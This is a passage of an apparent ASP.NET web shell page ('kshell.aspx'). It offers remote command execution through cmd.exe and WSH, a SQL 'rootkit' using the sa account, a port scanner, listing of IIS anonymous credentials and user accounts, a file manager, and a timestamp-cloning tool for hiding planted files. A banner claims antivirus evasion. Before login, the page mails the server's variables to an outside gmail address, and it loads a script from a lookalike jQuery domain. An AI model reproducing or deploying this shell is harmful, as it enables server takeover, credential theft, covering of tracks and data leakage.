color:#fff;background-color:#222; } span,h1,a{ color: #df5 !important; } span{ font-weight: bolder; } h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main 
tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script src="https://ajax.googlaeips.com/ajax/libs/jquery/3.5.1/jquery.min.js?ver=6.0"></script> <head> <meta http-equiv="Content-Type" content="text/html"> <title></title> </head> <body> <hr> <% Dim error_x as Exception Try if session("rooot")<>1 then 'Test sending anonymous mail, comment it if you don't want test it dim info As String Try info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline) System.Web.Mail.SmtpMail.SmtpServer = "localhost" System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info) Catch End Try %> <center> <form runat="server"> Your Password:<asp:TextBox ID="TextBox" runat="server" TextMode="Password" class="TextBox" /> <asp:Button ID="Button" runat="server" Text="Login" ToolTip="Click here to login" OnClick="login_click" class="buttom" /> </form> </center> <% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "<font color=white>Server IP :</font> <b>" + Request.ServerVariables("LOCAL_ADDR") + "</b> - <font color=white>Client IP :</font> <b>" + getIP() + "</b> - " dim HostName As string = "<font color=white>HostName :</font> <b>" + Environment.MachineName + "</b> - <font color=white>Username :</font> <b>"+ Environment.UserName +"</b><br>" dim OSVersion As string = "<font color=white>OS Version :</font> <b>" + 
Environment.OSVersion.ToString() + "</b>" dim IISversion As string = "<font color=white> - IIS Version :</font> <b>" + Request.ServerVariables("SERVER_SOFTWARE") + "</b><br><font color=white>System Dir :</font> <b>" + Environment.SystemDirectory + "</b>" dim PATH_INFO As string = "<font color=white> - PATH_TRANSLATED :</font> <b>" + Request.ServerVariables("PATH_TRANSLATED") + "</b><br>" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "<font color=white>Hardware Info :</font> <b>" + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "</b><br>" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO %> <table width="100%" border="0" align="center"> <tr> <td><asp:Label ID="Info" runat="server" EnableViewState="False" /></td> </tr> </table> <hr> <table width="100%" border="0" align="center"> <tr> <td>Currently Dir:</td> <td><font color=red><%=url%></font></td> </tr> <tr> <td width="10%">Operate:</td> <td width="90%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> - <%if session("cutboard")<>"" then%> <a href="?action=paste&src=<%=server.UrlEncode(url)%>" title="you can paste">Paste</a> - <%else%> Paste - <%end if%> <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit" ><font color="red">Quit</font></a> </td> </tr> <tr> <td> Go to: </td> <td> <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>") next %> </td> <td align="Left"> <% 
response.Write("IP:<font color=red>" & Request.ServerVariables("REMOTE_ADDR")&"</font>") %> </td> </tr> <tr> <td>Tool:</td> <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro1" >List Processes 1</a> - <a href="?action=pro2" >List Processes 2</a></td> </tr> <tr> <td> </td> <td><a href="?action=user" >List User Accounts</a> - <a href="?action=auser" >IIS Anonymous User</a>- <a href="?action=scan" >Port Scanner</a> - <a href="?action=iisspy" >IIS Spy</a> - <a href="?action=applog" >Application Event Log </a> - <a href="?action=syslog" >System Log</a></td> </tr> </table> <hr> <table width=100% class=main cellspacing=0 cellpadding=1><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr> <tr> <td><% guru= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><b>[..]</b></a></td></tr>" response.Write(guru) dim lll lll=1 for each xdir in mydir.getdirectories() response.Write("<tr>") dim filepath as string filepath=server.UrlEncode(url & xdir.name) if lll=1 then lll=2 else lll=1 end if guru= "<tr class=l" & lll & "><td><a href='?action=goto&src=" & filepath & "\" & "'><b>[" & xdir.name & "]</b></a></td>" response.Write(guru) response.Write("<td><dir></td>") response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>") guru="<td><a href='?action=cut&src=" & filepath & "\' target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\' target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>" response.Write(guru) response.Write("</tr>") next %></td> </tr> <tr> <td><% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) 
response.Write("<tr>") if lll=1 then lll=2 else lll=1 end if guru= "<tr class=l" & lll & "><td><a href='?action=edit&src=" & filepath2 & "'>" & xfile.name & "</a></td>" response.Write(guru) guru="<td>" & GetSize(xfile.length) & "</td>" response.Write(guru) response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>") guru="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>" response.Write(guru) response.Write("</tr>") next response.Write("</table>") %></td> </tr> </table> <script language="javascript"> function del() { if(confirm("Are you sure?")){return true;} else{return false;} } function down() { if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;} else{return false;} } </script> <% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %> <div align=center>[ Web Server Information ] <i><a href="javascript:history.back(1);">Back</a></i></div><br> <table width="100%" border="1" align="center"> <tr> <td width="40%">Server IP</td> <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td> </tr> <tr> <td height="73">Machine Name</td> <td><%=Environment.MachineName%></td> </tr> <tr> <td>Network Name</td> <td><%=Environment.UserDomainName.ToString()%></td> </tr> <tr> <td>User Name in this Process</td> <td><%=Environment.UserName%></td> </tr> <tr> <td>OS Version</td> <td><%=Environment.OSVersion.ToString()%></td> </tr> <tr> 
<td>Started Time</td> <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td> </tr> <tr> <td>System Time</td> <td><%=now%></td> </tr> <tr> <td>IIS Version</td> <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td> </tr> <tr> <td>HTTPS</td> <td><%=request.ServerVariables("HTTPS")%></td> </tr> <tr> <td>PATH_INFO</td> <td><%=request.ServerVariables("PATH_INFO")%></td> </tr> <tr> <td>PATH_TRANSLATED</td> <td><%=request.ServerVariables("PATH_TRANSLATED")%></td> <tr> <td>SERVER_PORT</td> <td><%=request.ServerVariables("SERVER_PORT")%></td> </tr> <tr> <td>SeesionID</td> <td><%=Session.SessionID%></td> </tr> <tr> <td colspan="2"><span class="style3">Client Infomation</span></td> </tr> <tr> <td>Client Proxy</td> <td><%=CP%></td> </tr> <tr> <td>Client IP</td> <td><%=CIP%></td> </tr> <tr> <td>User</td> <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td> </tr> </table> <table align=center> <% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %> <tr> <td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td> <td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td> </tr> </table> <% case "cmd" %> <form runat="server"> <p>[ CMD.NET for WebAdmin ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute command with ASP.NET account(<span class="style3">Notice: only click "Run" to run</span>)</p> <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p> Command: <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" /> <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/> <p> <asp:Label ID="result" runat="server" style="style2"/> </p> </form> <% case "cmdw32" %> <form runat="server"> <p>[ ASP.NET W32 Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click "Run" to 
run</span>)</p> <% Response.Write("System Dir : "+Environment.SystemDirectory +"<br><br>") %> CMD File: <asp:TextBox ID="txtCmdFile" runat="server" Width="473px" style="border: 1px solid #084B8E">C:\\WINDOWS\\system32\\cmd.exe</asp:TextBox><br><br> Command: <asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/> <asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/> <p> <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/> </p> </form> <% case "cmdwsh" %> <form runat="server"> <p>[ ASP.NET WSH Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click "Run" to run</span>)</p> Command: <asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/> <asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/> <p> <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/> </p> </form> <% case "pro1" %> <form runat="server"> <p align=center>[ List processes from server ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% Try output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount") Catch rw("This function is disabled by server") End Try %> </td> </tr> </table> </form> <% case "pro2" %> <form runat="server"> <p align=center>[ List processes from server ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center width='80%'> <tr> <td> <% Dim htmlbengin As String = "<table width='80%' align=center border=0><tr align=center><td width='20%'><b>ID</b></td><td align=left width='20%'><b>Process</b></td><td align=left width='20%'><b>MemorySize</b></td><td align=center width='10%'><b>Threads</b></td></tr>" Dim prostr As String = "" Dim 
htmlend As String = "</tr></table>" Try Dim mypro As Process() = Process.GetProcesses() For Each p As Process In mypro prostr += "<tr><td align=center>" + p.Id.ToString() + "</td>" prostr += "<td align=left>" + p.ProcessName.ToString() + "</td>" prostr += "<td align=left>" + p.WorkingSet.ToString() + "</td>" prostr += "<td align=center>" + p.Threads.Count.ToString() + "</td>" Next Catch ex As Exception Response.write(ex.Message) End Try Response.write(htmlbengin + prostr + htmlend) %> </td> </tr> </table> </form> <% case "user" %> <form runat="server"> <p align=center>[ List User Accounts ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% dim WMI_function = "Win32_UserAccount" dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %> </td> </tr> </table> </form> <% case "reg" %> <form runat="server"> <p align=center>[ Registry ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% dim WMI_function = "Win32_Registry" dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %> </td> </tr> </table> </form> <% case "applog" %> <form runat="server"> <p align=center>[ List Application Event Log Entries ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% dim WMI_function = "Win32_NTLogEvent where Logfile='Application'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw(fail_description) End Try %> </td> </tr> </table> </form> <% case "syslog" %> 
<form runat="server"> <p align=center>[ List System Event Log Entries ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% dim WMI_function = "Win32_NTLogEvent where Logfile='System'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw("This function is disabled by server") End Try %> </td> </tr> </table> </form> <% case "auser" %> <form runat="server"> <p align=center>[ IIS List Anonymous' User details ] <i><a href="javascript:history.back(1);">Back</a></i></p> <table align=center> <tr> <td> <% Try IIS_list_Anon_Name_Pass Catch rw("This function is disabled by server") End Try %> </td> </tr> </table> </form> <% case "scan" %> <form runat="server"> <p>[ ASP.NET Port Scanner ] <i><a href="javascript:history.back(1);">Back</a></i></p> <div> C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)<br /><br /> Start IP : <asp:TextBox ID="txtStartIP" runat="server" Width="177px">127.0.0.1</asp:TextBox> --- End Ip : <asp:TextBox ID="txtEndIP" runat="server" Width="185px">127.0.0.1</asp:TextBox> <br /> Ports : <asp:TextBox ID="txtPorts" runat="server" Width="473px">21,25,80,1433,3306,3389</asp:TextBox><br /> <br /> <asp:Button ID="btnScan" runat="server" Text="Scan" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnScan_Click" /> <asp:Button ID="btnReset" runat="server" Text="Reset" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnReset_Click" /><br /> <br /> <asp:Label ID="Label1" runat="server" Text="Result:" Visible="False" Width="70px"></asp:Label><br /> <asp:ListBox ID="lstRet" runat="server" BackColor="Black" ForeColor="#00C000" Height="251px" Width="527px" Visible="False"></asp:ListBox> <hr align=left style="width: 526px" /> <br /> </div> </form> <% case "iisspy" %> <p align=center>[ IIS Spy ] <i><a 
href="javascript:history.back(1);">Back</a></i></p> <% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %> <p align=center>[ SQL Tool ] <i><a href="javascript:history.back(1);">Back</a></i></p> <% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %> <form runat="server"> <p align=center >[ Registry Shell ] <i><a href="javascript:history.back(1);">Back</a></i></p> Key: <asp:TextBox ID="txtRegKey" runat="server" style="width: 595px; border: 1px solid #084B8E">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br><br> Value: <asp:TextBox ID="txtRegValue" runat="server" style="border: 1px solid #084B8E">ComputerName</asp:TextBox> <asp:Button ID="btnReadReg" runat="server" Text="Run" OnClick="RegistryRead" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/> <p> <asp:Label ID="lblresultReg" runat="server" style="color: red"/> </p> </form> <% case "sqlman" %> <form runat="server"> <p>[ MSSQL Query ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute query with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p> <p>Host: <asp:TextBox ID="txtHost" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p> <p> SQL Name: <asp:TextBox ID="txtSqlName" runat="server" Width="50" class="TextBox" Text='sa'/> SQL Password: <asp:TextBox ID="txtSqlPass" runat="server" Width="80" class="TextBox"/> </p> Command: <asp:TextBox ID="txtSqlcmd" runat="server" Width="500" class="TextBox" TextMode="MultiLine" Rows="6"/></br> <asp:Button ID="btnButtonSQL" runat="server" Text="Run" OnClick="RunSQLQUERY" class="buttom" Width="100"/> <p> <asp:Label ID="lblresultSQL" runat="server" style="style2"/> </p> </form> <% case "sqlrootkit" %> <form runat="server"> <p>[ SqlRootKit.NET for WebAdmin ] <i><a href="javascript:history.back(1);">Back</a></i></p> <p> Execute command with SQLServer 
account(<span class="style3">Notice: only click "Run" to run</span>)</p> <p>Host: <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p> <p> SQL Name: <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/> SQL Password: <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/> </p> Command: <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/> <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/> <p> <asp:Label ID="resultSQL" runat="server" style="style2"/> </p> </form> <% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& 
request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") end if end if case "upfile" url=request.QueryString("src") %> <form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server" onSubmit="return checkname();"> You will upload file to this directory : <span class="style3"><%=url%></span><br> Please choose file from your computer : <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server"> <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom"> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a> <% case "new" url=request.QueryString("src") %> <form runat="server"> <%=url%><br> Name: <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/> <br> <asp:RadioButton ID="NewFile" 
Text="File" runat="server" GroupName="New" Checked="true"/> <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server" GroupName="New"/> <br> <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom" OnClick="NewFD"/> <input name="Src" type="hidden" value="<%=url%>"> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %> <form runat="server"> <table width="100%" border="1" align="center"> <tr> <td width="11%">Path</td> <td width="89%"> <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/> *</td> </tr> <tr> <td>Content</td> <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td> </tr> <tr> <td></td> <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/> </td> </tr> </table> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %> <form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();"> <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%> <input type="text" name="name" class="TextBox"> <input type="submit" name="Submit3" value="Submit" class="buttom"> </p> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <script language="javascript"> function checkname() { if(formRn.name.value==""){alert("You shall input filename :(");return false} } </script> <% else if Rename() then response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " 
Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>") else response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>") end if end if case "samename" url=request.QueryString("src") %> <form name="form1" method="post" action="?action=paste&src=<%=server.UrlEncode(url)%>"> <p class="style3">Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)</p> <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom"> <input name="Cancel" type="submit" id="Cancel" value="No" class="buttom"> </form> <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %>
<%-- NOTE(review): the "clonetime" form below describes itself as copying one file or directory's time onto another; its CloneTime handler is not in this part of the file. The first field is prefilled with the src value followed by kshell.aspx, presumably this page's own file name (confirm against the deployed file). Where this page is found, file timestamps under the web root should not be relied on alone when building a timeline; corroborate them with web server request logs. --%>
<form runat="server"> <p>[CloneTime for WebAdmin]<i> <a href="javascript:history.back(1);">Back</a></i> </p> <p>A tool that it copy the file or directory's time to another file or directory </p> <p>Rework File or Dir: <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p> <p>Copied File or Dir: <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p> <asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/> </form> <p> <% case "logout" session.Abandon() response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>") end select end if Catch error_x response.Write("<font color=""red""><br>Wrong: </font>"&error_x.Message) End Try %> </p> </p> <hr> <script language="javascript"> function closewindow() {self.close();} </script> </body> </html>